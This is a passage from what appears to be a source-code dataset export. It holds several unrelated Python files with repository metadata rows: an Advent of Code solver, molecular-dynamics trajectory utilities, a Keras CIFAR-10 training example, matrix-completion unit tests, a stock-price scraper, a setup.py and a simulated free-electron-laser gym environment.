with open(sys.argv[1] if len(sys.argv) >= 2 else 'aoc24_input.txt') as f:
input = f.read().splitlines()
code = [tuple(l.split()) for l in input]
params = list(zip(*[[int(l[2]) for l in code[offs::18]] for offs in (4, 5, 15)]))
# print(params)
# The input code repeats this loop 14 times with an input digit each,
# the only difference being the 3 parameters extracted above.
# This is not really needed except for the final asserts.
def monad(inputs):
z = 0
for (a, b, c), d in zip(params, inputs):
inp = int(d)
z, x = divmod(z, a) # a is always either 1 (=noop) or 26 (=pop)
if x != inp - b: # for every a==26 this must be avoided
z = 26 * z + (inp + c) # push inp + c
return z
def find(part):
inputs = []
z = 0
pushes = []
for i in range(14):
a, b, c = params[i]
if a == 1:
z = z * 26 + c
inputs.append(9 if part == 1 else 1) # assume best case
pushes.append(i)
else:
assert a == 26
ptr = pushes.pop()
z, x = divmod(z, 26)
inputs.append(inputs[ptr] + x + b)
if inputs[i] > 9: # adjust down
assert part == 1
inputs[ptr] += 9 - inputs[i]
inputs[i] = 9
elif inputs[i] < 1: # adjust up
assert part == 2
inputs[ptr] += 1 - inputs[i]
inputs[i] = 1
return ''.join(str(d) for d in inputs)
p1 = find(part=1)
assert monad(p1) == 0
print(f'Part 1: {p1=}')
p2 = find(part=2)
assert monad(p2) == 0
print(f'Part 2: {p2=}')
| 32.875 | 81 | 0.548954 | 327 | 2,104 | 3.529052 | 0.461774 | 0.036395 | 0.010399 | 0.015598 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.039971 | 0.334125 | 2,104 | 63 | 82 | 33.396825 | 0.783726 | 0.343156 | 0 | 0.046512 | 0 | 0 | 0.030059 | 0 | 0 | 0 | 0 | 0 | 0.116279 | 1 | 0.046512 | false | 0 | 0.023256 | 0 | 0.116279 | 0.046512 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df41555b18281e7b1b5ce196861c57f7bd6e3924 | 6,471 | py | Python | string-method/src/stringprocessor/processing_utils.py | delemottelab/gpcr-string-method-2019 | b50786a4a8747d56ad04ede525592eb31f1890fd | [
"MIT"
] | null | null | null | string-method/src/stringprocessor/processing_utils.py | delemottelab/gpcr-string-method-2019 | b50786a4a8747d56ad04ede525592eb31f1890fd | [
"MIT"
] | null | null | null | string-method/src/stringprocessor/processing_utils.py | delemottelab/gpcr-string-method-2019 | b50786a4a8747d56ad04ede525592eb31f1890fd | [
"MIT"
] | 3 | 2020-03-16T04:33:50.000Z | 2021-03-19T17:25:59.000Z | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
import sys
logging.basicConfig(
stream=sys.stdout,
level=logging.DEBUG,
format='%(asctime)s %(name)s-%(levelname)s: %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
from os.path import abspath, exists
import numpy as np
import mdtraj as md
import matplotlib.pyplot as plt
import utils
import colvars
logger = logging.getLogger("SingleIterationPostProcessor")
def load_swarm(runner, point_idx, swarm_batch_idx, swarm_idx, ignore_missing_files=False,
traj_filetypes=["xtc", "trr"], fallback_on_restrained_output=True):
"""
Load a single swarm trajectory
:param runner:
:param point_idx:
:param swarm_batch_idx:
:param swarm_idx:
:param ignore_missing_files: return None instead of throwing exception when files are not found
:param traj_filetypes: types of trajectory file types to try and load
:param fallback_on_restrained_output: Try to load the restrained last frame and the .gro output for this swarm and create a 2-frame trajectory from this
:return: trajectory or None
"""
# Load swarm trajectory
found_traj = False
for ftype in traj_filetypes:
trajpath = runner.point_path(point_idx) + runner.swarm_name(point_idx, swarm_batch_idx, swarm_idx) + "." + ftype
if exists(trajpath):
found_traj = True
break
if not found_traj:
# if fallback_on_restrained_output:
# return load_restrained_out_swarm(runner, point_idx, swarm_batch_idx, swarm_idx,
# ignore_missing_files=ignore_missing_files)
if ignore_missing_files:
logger.warn("File %s not found. Skipping this swarm", trajpath)
return None
else:
raise IOError("Swarm %s-%s not found for point %s at iteration %s" % (
swarm_batch_idx, swarm_idx, point_idx, runner.iteration))
trajpath = abspath(trajpath)
try:
swarmtraj = md.load(trajpath, top=runner.topology)
except Exception as ex:
logger.exception(ex)
logger.error("Could not load file %s.", trajpath)
if fallback_on_restrained_output:
# Quite often
return load_restrained_out_swarm(runner, point_idx, swarm_batch_idx, swarm_idx,
ignore_missing_files=ignore_missing_files)
raise ex
return swarmtraj
def load_restrained_out_swarm(runner, point_idx, swarm_batch_idx, swarm_idx, ignore_missing_files=False):
"""
Try to load the restrained last frame and the .gro output for this swarm and create a 2-frame trajectory from this
:param runner:
:param point_idx:
:param swarm_batch_idx:
:param swarm_idx:
:param ignore_missing_files: return None if trajectory is not found instead of throwing exception
:return: a 2-frame trajectory
"""
restrained_out = load_restrained(runner, point_idx, only_last_frame=True, ignore_missing_files=ignore_missing_files)
swarm_out = load_swarm(runner, point_idx, swarm_batch_idx, swarm_idx, traj_filetypes=["gro"],
ignore_missing_files=ignore_missing_files, fallback_on_restrained_output=False)
if restrained_out is None or swarm_out is None:
msg = "%s not found from restrained_out. Skipping this swarm" % runner.swarm_name(point_idx, swarm_batch_idx,
swarm_idx)
if ignore_missing_files:
logger.warn(msg)
return None
else:
raise IOError(msg)
return restrained_out + swarm_out
def load_restrained(runner, point_idx, traj_filetypes=["trr", "xtc", "gro"], ignore_missing_files=False,
only_last_frame=True):
"""
:param runner:
:param point_idx:
:param traj_filetypes: types of trajectory file types to try and load
:param ignore_missing_files: return None if trajectory is not found instead of throwing exception
:param only_last_frame: only return the last frame
:return:
"""
found_traj = False
for ftype in traj_filetypes:
trajpath = runner.point_path(point_idx) + runner.point_name(point_idx) + "-restrained.%s" % ftype
if exists(trajpath):
found_traj = True
break
if not found_traj:
msg = "File %s not found. Skipping this swarm" % trajpath
if ignore_missing_files:
logger.warn(msg)
return None
else:
raise IOError(msg)
restrained = md.load(trajpath, top=runner.topology)
return restrained[-1] if only_last_frame else restrained
def merge_restrained(runner, traj_filetypes=["trr", "xtc", "gro"]):
"""Merge all restrained simulation endpoints for this iteration"""
traj = None
for idx in range(len(runner.stringpath)):
if runner.fixed_endpoints and (idx == 0 or idx == len(runner.stringpath) - 1):
continue
t = load_restrained(runner, idx, traj_filetypes=traj_filetypes)
if traj is None:
traj = t
else:
traj += t
return traj
def save_string(string_filepath, iteration, stringpath, append_length=False):
if append_length:
suffix = "{}_len{}".format(iteration, len(stringpath))
else:
suffix = str(iteration)
name = string_filepath % suffix
np.savetxt(name, stringpath)
def create_stringpath_files_of_different_lengths(runner, short_stringpath, number_of_points_to_add=1):
"""Modifies the current iteration's output string and adds a point to it. The original string is saved with a suffix"""
long_stringpath = utils.change_string_length(short_stringpath, len(short_stringpath) + number_of_points_to_add)
save_string(runner.string_filepath, runner.iteration, short_stringpath, append_length=True)
save_string(runner.string_filepath, runner.iteration, long_stringpath, append_length=True)
logger.info("Added %s points to string for iteration %s. New string length=%s", number_of_points_to_add,
runner.iteration, len(long_stringpath))
return long_stringpath
def save_input_coordinate_mapping(string_filepath, iteration, input_coordinate_mapping):
filepath = string_filepath % (str(iteration) + "-mapping")
np.savetxt(filepath, input_coordinate_mapping)
| 41.748387 | 156 | 0.684593 | 838 | 6,471 | 5.036993 | 0.186158 | 0.052357 | 0.072495 | 0.034115 | 0.497276 | 0.444681 | 0.400142 | 0.36271 | 0.344705 | 0.344705 | 0 | 0.001421 | 0.238912 | 6,471 | 154 | 157 | 42.019481 | 0.855635 | 0.222686 | 0 | 0.267327 | 0 | 0 | 0.085019 | 0.010423 | 0 | 0 | 0 | 0 | 0 | 1 | 0.069307 | false | 0 | 0.108911 | 0 | 0.267327 | 0.009901 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df4222a6ed7b73ffb1dc9e9798f1e7e335b7d1bc | 3,893 | py | Python | examples/reporter/main.py | run-ai/runai | c73bf522d4b2cdd2ecc6c065ab56330718a97566 | [
"MIT"
] | 86 | 2020-01-23T18:56:41.000Z | 2022-02-14T22:32:08.000Z | examples/reporter/main.py | Raghvender1205/runai | c73bf522d4b2cdd2ecc6c065ab56330718a97566 | [
"MIT"
] | 18 | 2020-01-24T17:55:18.000Z | 2021-12-01T01:01:32.000Z | examples/reporter/main.py | Raghvender1205/runai | c73bf522d4b2cdd2ecc6c065ab56330718a97566 | [
"MIT"
] | 12 | 2020-02-03T14:30:44.000Z | 2022-01-08T16:06:59.000Z | import os
import time
import keras
import numpy as np
import scipy # scipy.misc.imresize() is was removed in scipy-1.3.0
import runai.reporter.keras
BATCH_SIZE = 64
IMAGE_SIZE = 224
def resize_images(src, shape):
resized = [scipy.misc.imresize(img, shape, 'bilinear', 'RGB') for img in src]
return np.stack(resized)
def load_cifar10_data():
path = '/src/examples/reporter/cifar-10'
num_train_samples = 50000
x_train = np.empty((num_train_samples, 3, 32, 32), dtype='uint8')
y_train = np.empty((num_train_samples,), dtype='uint8')
for i in range(1, 6):
fpath = os.path.join(path, 'data_batch_' + str(i))
(x_train[(i - 1) * 10000: i * 10000, :, :, :],
y_train[(i - 1) * 10000: i * 10000]) = keras.datasets.cifar.load_batch(fpath)
fpath = os.path.join(path, 'test_batch')
x_test, y_test = keras.datasets.cifar.load_batch(fpath)
y_train = np.reshape(y_train, (len(y_train), 1))
y_test = np.reshape(y_test, (len(y_test), 1))
if keras.backend.image_data_format() == 'channels_last':
x_train = x_train.transpose(0, 2, 3, 1)
x_test = x_test.transpose(0, 2, 3, 1)
return (x_train, y_train), (x_test, y_test)
def cifar10_data(train_samples, test_samples, num_classes, trg_image_dim_size):
(x_train, y_train), (x_test, y_test) = load_cifar10_data()
print('Loaded train samples')
x_train = x_train[:train_samples]
y_train = y_train[:train_samples]
x_test = x_test[:test_samples]
y_test = y_test[:test_samples]
x_train = resize_images(x_train, (trg_image_dim_size, trg_image_dim_size))
x_test = resize_images(x_test, (trg_image_dim_size, trg_image_dim_size))
y_train = np.clip(y_train, None, num_classes - 1)
y_test = np.clip(y_test, None, num_classes - 1)
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
print('Preprocessed train samples')
print('X train shape: %s' % str(x_train.shape))
print('Y train shape: %s' % str(y_train.shape))
print('X test shape: %s' % str(x_test.shape))
print('Y test shape: %s' % str(y_test.shape))
return (x_train, y_train), (x_test, y_test)
class StepTimeReporter(keras.callbacks.Callback):
def on_batch_begin(self, batch, logs={}):
self.batch_start = time.time()
def on_batch_end(self, batch, logs={}):
print(' >> Step %d took %g sec' % (batch, time.time() - self.batch_start))
def on_epoch_begin(self, epoch, logs=None):
self.epoch_start = time.time()
def on_epoch_end(self, epoch, logs=None):
print(' >> Epoch %d took %g sec' % (epoch, time.time() - self.epoch_start))
def main():
with runai.reporter.keras.Reporter(autolog=True) as reporter:
reporter.reportParameter("state", "Loading data")
(x_train, y_train), (x_test, y_test) = cifar10_data(
train_samples=5000,
test_samples=1000,
num_classes=10,
trg_image_dim_size=IMAGE_SIZE,
)
reporter.reportParameter("state", "Building model")
model = keras.applications.vgg19.VGG19(
input_shape=x_train[0].shape,
include_top=True,
weights=None,
input_tensor=None,
pooling=None,
classes=10)
model.compile(loss='categorical_crossentropy',
optimizer=keras.optimizers.SGD(lr=1e-3),
metrics=['accuracy'])
reporter.reportParameter("state", "Training model")
model.fit(x_train, y_train,
batch_size=BATCH_SIZE,
epochs=10,
validation_data=(x_test, y_test),
shuffle=False,
verbose=1,
callbacks=[StepTimeReporter()])
reporter.reportParameter("state", "Done")
if __name__ == "__main__":
main()
| 33.273504 | 86 | 0.63627 | 554 | 3,893 | 4.203971 | 0.247292 | 0.046372 | 0.02705 | 0.025762 | 0.218978 | 0.134822 | 0.068699 | 0.068699 | 0.024045 | 0 | 0 | 0.029422 | 0.231698 | 3,893 | 116 | 87 | 33.560345 | 0.749248 | 0.0131 | 0 | 0.022989 | 0 | 0 | 0.090885 | 0.014323 | 0 | 0 | 0 | 0 | 0 | 1 | 0.091954 | false | 0 | 0.068966 | 0 | 0.206897 | 0.091954 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df448b1fe5980f6ff5ca821f44dfced35dad6d97 | 7,134 | py | Python | tests/test_soft_impute.py | cs224/sparseMF | 39fbede77eceb5231db875820da94b68a5227e0d | [
"Apache-2.0"
] | 10 | 2017-10-16T18:50:53.000Z | 2021-11-07T05:34:58.000Z | tests/test_soft_impute.py | cs224/sparseMF | 39fbede77eceb5231db875820da94b68a5227e0d | [
"Apache-2.0"
] | null | null | null | tests/test_soft_impute.py | cs224/sparseMF | 39fbede77eceb5231db875820da94b68a5227e0d | [
"Apache-2.0"
] | 5 | 2018-05-30T06:19:35.000Z | 2021-05-29T20:55:28.000Z | import numpy as np
from sparse_soft_impute import SoftImpute, SPLR
from scipy.sparse import coo_matrix, csr_matrix, csc_matrix, lil_matrix
from sklearn.utils.testing import assert_raises, assert_equal, assert_array_equal
import unittest
class TestPredict(unittest.TestCase):
''' Unit Tests for the Sparse implementation of SoftImpute '''
def setUp(self):
row = np.array([0, 3, 1, 0, 4])
col = np.array([0, 3, 1, 2, 5])
data = np.array([4, -5, 7, -9, 2])
self.x = csr_matrix((data, (row, col)), shape=(5, 6))
self.si = SoftImpute()
self.x_pred = self.si.complete(self.x)
self.splr = SPLR(self.si.prepare_input_data(self.x))
def test_prepare_input_data(self):
'''
Ensure that prepare_input_data method sets the missing mask
and clips max_rank back to an acceptable level, if it is outside
bounds.
'''
self.assertTrue(len(self.si.missing_mask) == 3)
self.assertTrue(self.si.max_rank == 2)
self.si.max_rank = 10
self.si.prepare_input_data(self.x)
self.assertFalse(self.si.max_rank == 10)
def test_fill(self):
'''
For the sparse setting, fill calls _preprocess_sparse(X). This
test ensures the preprocessing step works as expected, and outputs
are of the expected dimensions.
'''
rows, cols, shape = self.si.missing_mask
self.assertTrue(len(rows) == len(cols))
self.assertTrue(len(shape) == 2)
U, D_sq, V = self.si.fill(self.x, inplace=True)
self.assertTrue(U.shape == (shape[0], self.si.max_rank))
self.assertTrue(np.all(D_sq == np.ones(self.si.max_rank)))
self.assertTrue(np.all(V == np.zeros((shape[1],self.si.max_rank))))
def test_UD(self):
U = np.ones((6,3))
D = np.ones(3)
m = 6
expected = np.ones((6,3))
self.assertTrue(np.all(expected == self.si._UD(U, D, m)))
def test_xhat_pred(self):
'''
Ensures that the first value outputted by _xhat_pred is equal to the first output from x_result_svd's recomposed output.
'''
x_result_svd = self.x_pred
x_dense = x_result_svd[0].dot(np.diag(x_result_svd[1]).dot(x_result_svd[2].T))
self.assertAlmostEqual(x_dense[0,0], self.si._xhat_pred()[0], places=5)
def test_als_u_step(self):
'''
Tests that the output shapes are correct.
'''
V_expected_shape = (5,2)
D_sq_expected_length = self.si.max_rank
self.si._als_u_step()
output = self.si.X_fill
self.assertTrue(len(output[1]) == D_sq_expected_length)
self.assertTrue(output[0].shape == V_expected_shape)
def test_als_v_step(self):
'''
Tests that the output shapes are correct.
'''
us, d_sqs, vs = (5,2), 2, (6,2)
self.si._als_v_step()
output = self.si.X_fill
self.assertTrue(output[0].shape == us)
self.assertTrue(len(output[1]) == 2)
self.assertTrue(output[2].shape == vs)
def test_fnorm(self):
'''
Calculated Frobenius Norm by hand, ensured matching results
'''
output = self.si._fnorm(self.si.fill(self.x), self.x_pred)
expected_output = 1
self.assertAlmostEqual(expected_output, output, places=2)
def test_als_cleanup_step(self):
'''
Tests that the output shapes are correct.
'''
Us, D_sqs, Vs = (5,2), 2, (6,2)
self.si._als_cleanup_step()
output = self.si.X_fill
self.assertTrue(output[0].shape == Us)
self.assertTrue(len(output[1]) == 2)
self.assertTrue(output[2].shape == Vs)
def test_als_step(self):
'''
Ensure that X_fill_svd is updating, and that shapes remain correct.
'''
Uo, so, Vo = self.x_pred
U, s, V = self.si.fill(self.x)
self.assertTrue(U.shape == Uo.shape)
self.assertTrue(V.shape == Vo.shape)
self.assertFalse(np.all(s == so))
self.assertFalse(np.all(U == Uo))
self.assertFalse(np.all(V == Vo))
def test_solve(self):
'''
Ensure shape of output is correct.
'''
output = self.si.solve(self.x_pred, self.x)
U, s, V = output
Uo, so, Vo = self.si.fill(self.x)
self.assertTrue(U.shape == Uo.shape)
self.assertTrue(V.shape == Vo.shape)
self.assertFalse(np.all(s == so))
self.assertFalse(np.all(U == Uo))
self.assertFalse(np.all(V == Vo))
def test_predict_one(self):
self.assertEqual(self.si.predict(1,1), 7)
self.assertNotEqual(self.si.predict(0,1), 0)
with self.assertRaises(ValueError):
self.si.predict(5,0)
def test_predict_many(self):
col_ids = np.array([0, 3, 5, 2])
row_ids = np.array([0, 3, 4, 0])
expected = np.array([4, -5, 2, -9])
self.assertTrue(np.all(self.si.predict(row_ids, col_ids) == expected))
#col_ids = np.array([1,2,1,1,4])
#row_ids = np.array([2,1,1,3,4])
#x_result_svd = si.complete(x)
#x_dense = x_result_svd[0].dot(np.diag(x_result_svd[1]).dot(x_result_svd[2].t))
#unknown_in = zip(row_ids, col_ids)
#expected = np.empty(len(unknown_in))
#for idx, (r, c) in enumerate(unknown_in):
# expected[idx] = x_dense[r, c]
#self.asserttrue(np.all(si.predict_many(row_ids, col_ids) == expected))
if __name__ == '__main__':
unittest.main()
'''
# test parameters
sf = SoftImpute(max_rank=3, shrinkage_value=1, init_fill_method='sparse')
# original dataset:
xsc = np.array([[ 0.1390011, -0.09270246, -0.04629866, 0, 0], [-0.4469535, 0, 0.44695354, 0, 0], [-0.8252855, 0, 0, 0.1160078, 0.7092777], [-0.1981945, -0.7993484, 0.16913247, 0.8089969, 0], [ 0.9662344, 0.01088327, -0.56979652, -0.9250004, 0.5176792], [ 0.3651963, 0.86175224, 0, 0, -1.2269486]])
x_orig = csc_matrix(xsc)
# same dataset rounded and in more legible format:
np.array([[ 0.14, -0.09, -0.05, 0. , 0. ],
[-0.45, 0. , 0.45, 0. , 0. ],
[-0.83, 0. , 0. , 0.12, 0.71],
[-0.2 , -0.8 , 0.17, 0.81, 0. ],
[ 0.97, 0.01, -0.57, -0.93, 0.52],
[ 0.37, 0.86, 0. , 0. , -1.23]])
# results from Trevor Hasties (roughly; these were actually my results from my version)
np.array([[ 0.03, 0. , -0.02, -0.03, 0.02],
[-0.18, -0.09, 0.1 , 0.17, 0.02],
[-0.26, -0.28, 0.09, 0.18, 0.3 ],
[-0.31, -0.24, 0.13, 0.25, 0.19],
[ 0.42, 0.08, -0.26, -0.42, 0.16],
[ 0.25, 0.42, -0.03, -0.12, -0.55]]) '''
| 40.765714 | 305 | 0.543454 | 1,034 | 7,134 | 3.610251 | 0.22824 | 0.049826 | 0.024109 | 0.024377 | 0.321993 | 0.260113 | 0.250469 | 0.236003 | 0.209483 | 0.198232 | 0 | 0.087036 | 0.309083 | 7,134 | 174 | 306 | 41 | 0.670319 | 0.160499 | 0 | 0.163043 | 0 | 0 | 0.001906 | 0 | 0 | 0 | 0 | 0 | 0.369565 | 1 | 0.141304 | false | 0 | 0.054348 | 0 | 0.206522 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df44da4ef35197d7d9945d76216ec30f27d1d9a7 | 501 | py | Python | web_programming/current_stock_price.py | JB1959/Python | b6ca263983933c3ecc06ed0083dd11b6faf870c8 | [
"MIT"
] | 145,614 | 2016-07-21T05:40:05.000Z | 2022-03-31T22:17:22.000Z | web_programming/current_stock_price.py | Agha-Muqarib/Python | 04f156a8973d6156a4357e0717d9eb0aa264d086 | [
"MIT"
] | 3,987 | 2016-07-28T17:31:25.000Z | 2022-03-30T23:07:46.000Z | web_programming/current_stock_price.py | Agha-Muqarib/Python | 04f156a8973d6156a4357e0717d9eb0aa264d086 | [
"MIT"
] | 40,014 | 2016-07-26T15:14:41.000Z | 2022-03-31T22:23:03.000Z | import requests
from bs4 import BeautifulSoup
def stock_price(symbol: str = "AAPL") -> str:
url = f"https://in.finance.yahoo.com/quote/{symbol}?s={symbol}"
soup = BeautifulSoup(requests.get(url).text, "html.parser")
class_ = "My(6px) Pos(r) smartphone_Mt(6px)"
return soup.find("div", class_=class_).find("span").text
if __name__ == "__main__":
for symbol in "AAPL AMZN IBM GOOG MSFT ORCL".split():
print(f"Current {symbol:<4} stock price is {stock_price(symbol):>8}")
| 33.4 | 77 | 0.674651 | 74 | 501 | 4.378378 | 0.689189 | 0.092593 | 0.098765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011848 | 0.157685 | 501 | 14 | 78 | 35.785714 | 0.755924 | 0 | 0 | 0 | 0 | 0 | 0.407186 | 0.047904 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.2 | 0 | 0.4 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df44f6107463c12a6376b5f9f8eb4b96683a6ba1 | 2,006 | py | Python | setup.py | jacobic/spiders | 287dcf041ba248dd369646236cdbf07ecf32d4e8 | [
"MIT"
] | null | null | null | setup.py | jacobic/spiders | 287dcf041ba248dd369646236cdbf07ecf32d4e8 | [
"MIT"
] | null | null | null | setup.py | jacobic/spiders | 287dcf041ba248dd369646236cdbf07ecf32d4e8 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""The setup script."""
from setuptools import setup, find_packages
with open('README.rst') as readme_file:
readme = readme_file.read()
with open('HISTORY.rst') as history_file:
history = history_file.read()
requirements = ['Click>=6.0', 'colossus', 'astropy', 'pandas', 'scikit-learn',
'numpy', 'scipy', 'dill', 'emcee', 'tqdm', 'multiprocess',
'dask', 'pyspark', 'pymangle'
]
dependency_links = [
# Make sure to include the `#egg` portion so the `install_requires`
# recognizes the package
# Dask friendly version of emcee.
'git+ssh://git@github.com/jacobic/emcee.git#egg=emcee-emcee-2.2.1'
#
]
setup_requirements = ['pytest-runner', ]
test_requirements = ['pytest', ]
setup(author="Jacob Ider Chitham", author_email='jacobic@mpe.mpg.de',
classifiers=['Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License', 'Natural Language :: English',
"Programming Language :: Python :: 2",
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7', ],
description="Python Boilerplate contains all the boilerplate you need to "
"create a Python package.",
entry_points={
'console_scripts': ['spiders=spiders.cli:main', ], },
install_requires=requirements, license="MIT license",
long_description=readme + '\n\n' + history, include_package_data=True,
keywords='spiders', name='spiders',
packages=find_packages(include=['spiders', 'spiders.*']),
setup_requires=setup_requirements, test_suite='tests',
tests_require=test_requirements, url='https://github.com/jacobic/spiders',
version='0.1.0', zip_safe=False, )
| 37.849057 | 80 | 0.641077 | 231 | 2,006 | 5.467532 | 0.536797 | 0.105305 | 0.138559 | 0.10293 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013741 | 0.201894 | 2,006 | 52 | 81 | 38.576923 | 0.775141 | 0.089731 | 0 | 0 | 0 | 0.027778 | 0.460309 | 0.048512 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.027778 | 0 | 0.027778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df45960db91c2753ebf54796d5923cb3020270a4 | 13,091 | py | Python | local_fel_simulated_env.py | MathPhysSim/FERMI_RL_Paper | 4529fcbfa0cc35e5fa59463df2c423a497736eba | [
"MIT"
] | 7 | 2021-02-05T18:02:43.000Z | 2022-02-22T13:54:30.000Z | local_fel_simulated_env.py | MathPhysSim/FERMI_RL_Paper | 4529fcbfa0cc35e5fa59463df2c423a497736eba | [
"MIT"
] | 3 | 2021-01-16T17:08:17.000Z | 2021-01-19T13:38:42.000Z | local_fel_simulated_env.py | MathPhysSim/FERMI_RL_Paper | 4529fcbfa0cc35e5fa59463df2c423a497736eba | [
"MIT"
] | 2 | 2021-01-15T11:08:36.000Z | 2021-11-22T06:26:42.000Z | import pickle
import numpy as np
import gym
# import pybobyqa
import tensorflow as tf
import matplotlib.pyplot as plt
import pandas as pd
from simulated_tango import SimTangoConnection
class FelLocalEnv(gym.Env):
def __init__(self, tango, **kwargs):
self.max_steps = 10
print('init env ' * 20)
self.init_rewards = []
self.done = False
self.current_length = 0
self.__name__ = 'FelLocalEnv'
self.curr_episode = -1
self.TOTAL_COUNTER = -1
self.rewards = []
self.states = []
self.actions = []
self.dones = []
self.initial_conditions = []
# tango = SimTangoConnection() simulates the behaviour of the system we want to control
self.tango = tango
# some information from tango
self.state_size = self.tango.state_size
self.action_size = self.tango.action_size
self.target_state = self.tango.target_state
self.target_intensity = self.tango.target_intensity
# current state
self.init_state = self.tango.state
# scaling factor definition
if 'half_range' in kwargs:
self.half_range = kwargs.get('half_range')
else:
self.half_range = 3000
self.state_range = self.get_range()
self.state_scale = 2 * self.half_range
# state, intensity and reward first definition
self.state = self.scale(self.init_state)
self.intensity = self.get_intensity()
self.reward = self.get_reward()
# max action allowed
if 'max_action' in kwargs:
max_action = kwargs.get('max_action')
else:
max_action = 500
# max_action = 6000
self.max_action = max_action / self.state_scale
print('max_action', max_action)
# state space definition
self.observation_space = gym.spaces.Box(low=0.0,
high=1.0,
shape=(self.state_size,),
dtype=np.float64)
# action space definition
self.action_space = gym.spaces.Box(low=-self.max_action,
high=self.max_action,
shape=(self.state_size,),
dtype=np.float64)
self.test = False
print('real env scale:', self.action_space.low, self.action_space.high, self.observation_space.low,
self.observation_space.high)
def get_range(self):
# defines the available state space
state_range = np.c_[self.init_state - self.half_range, self.init_state + self.half_range]
return state_range
def scale(self, state):
# scales the state from state_range values to [0, 1]
state_scaled = (state - self.state_range[:, 0]) / self.state_scale
return state_scaled
def descale(self, state):
# descales the state from [0, 1] to state_range values
state_descaled = state * self.state_scale + self.state_range[:, 0]
return state_descaled
def set_state(self, state):
# writes descaled state
state_descaled = self.descale(state)
self.tango.set_state(state_descaled)
def get_state(self):
# read scaled state
state = self.tango.get_state()
state_scaled = self.scale(state)
return state_scaled
def set_state_ext(self, state):
state_descaled = self.descale(state)
self.tango.set_state(state_descaled)
state = self.tango.get_state()
self.state = self.scale(state)
def norm_intensity(self, intensity):
# normalize the intensity with respect to target_intensity
intensity_norm = intensity / self.target_intensity
return intensity_norm
def get_intensity(self):
# read normalized intensity
intensity = self.tango.get_intensity()
intensity_norm = self.norm_intensity(intensity)
return intensity_norm
def step(self, action):
action = np.squeeze(action)
# print('a', action)
# step method
self.current_length += 1
# rescale action
# action /= 6
# action = np.clip(action, -1, 1)
state, reward = self.take_action(action.copy())
# state = state + 1e-4*np.random.randn(self.observation_space.shape[-1])
# reward += 1e-4 * np.random.randn(1)[0]
intensity = self.get_intensity()
# print('intensity', intensity)
# if any(self.states[self.curr_episode][-1] == state):
# self.boundary += 1
# print('boundary hit nr: ', self.boundary)
# else:
# self.boundary = -1
if intensity > .95:
self.done = True
# print('passed at', intensity)
# elif self.boundary > 10:
# self.done = True
elif self.current_length >= self.max_steps:
# print('failed at', intensity)
self.done = True
# elif any(self.state + action)<0 or any(self.state + action)>1:
# self.done = True
# print('step:')
# print()
# # print('s ', state)
########################################################################################################
# print(self.curr_episode, self.current_length, 'state ', state, 'a ', action, 'r ', reward)
########################################################################################################
if self.test:
self.add_trajectory_data(state=state, action=action, reward=reward, done=self.done)
# if self.done:
# print('done at ', reward)
return state, reward, self.done, {}
def take_action(self, action):
# print('action inner: ', np.round(action*12,2))
# action /= 12
# take action method
new_state = self.state + action # + 0.05*np.random.randn(action.shape[-1])
# state must remain in [0, 1]
if any(new_state < 0.0) or any(new_state > 1.0):
new_state = np.clip(new_state, 0.0, 1.0)
# self.done = True
# print('WARNING: state boundaries!')
# set new state to the machine
self.set_state(new_state)
state = self.get_state()
self.state = state
# get new intensity from the machine
intensity = self.get_intensity()
self.intensity = intensity
# reward calculation
reward = self.get_reward()
self.reward = reward
return state, reward
def get_reward(self):
# You can change reward function, but it should depend on intensity
# e.g. next line
reward = -(1 - self.intensity / self.target_intensity)
# reward = self.intensity
return reward
def reset(self, **kwargs):
# print('reset true env')
self.boundary = -1
# reset method
self.done = False
self.current_length = 0
# self.curr_step = 0
bad_init = True
while bad_init:
if 'set_state' in kwargs:
